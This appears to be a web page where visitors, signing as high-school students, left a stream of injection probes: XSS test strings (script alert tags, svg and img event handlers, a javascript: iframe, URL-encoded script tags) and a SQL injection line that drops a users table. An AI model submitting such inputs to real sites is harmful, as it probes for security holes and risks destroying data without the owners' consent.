<p>
Tempe High School Students WERE HERE!
</p>
<p>
<script>alert(1)</script>
</p>
<p>
<script>alert(1)</script>
</p>
<p>
<img src=x onload(alert(1))>
</p>
<p>
<svg onload=alert(1)>
</p>
<p>
<iframe src=”javascript:alert(1)”></iframe>
</p>
<p>
<img src=x onload(alert(1))>
</p>
<p>
<svg onload=alert(1)>
</p>
<p>
<img src=x onload(alert(1))><img src=x onload(alert(1))><img src=x onload(alert(1))><img src=x onload(alert(1))><img src=x onload(alert(1))><img src=x onload(alert(1))>
</p>
<p>
<img src=x onload(alert(1))>
</p>
<p>
105; DROP TABLE users
</p>
<p>
105; DROP TABLE users
</p>
<p>
<script>alert(1)</script>
</p>
<p>
%3Cscript%3Ealert(1)%3C/script%3E
</p>
<p>
%3Cscript%3Ealert(1)%3C/script%3E
</p>
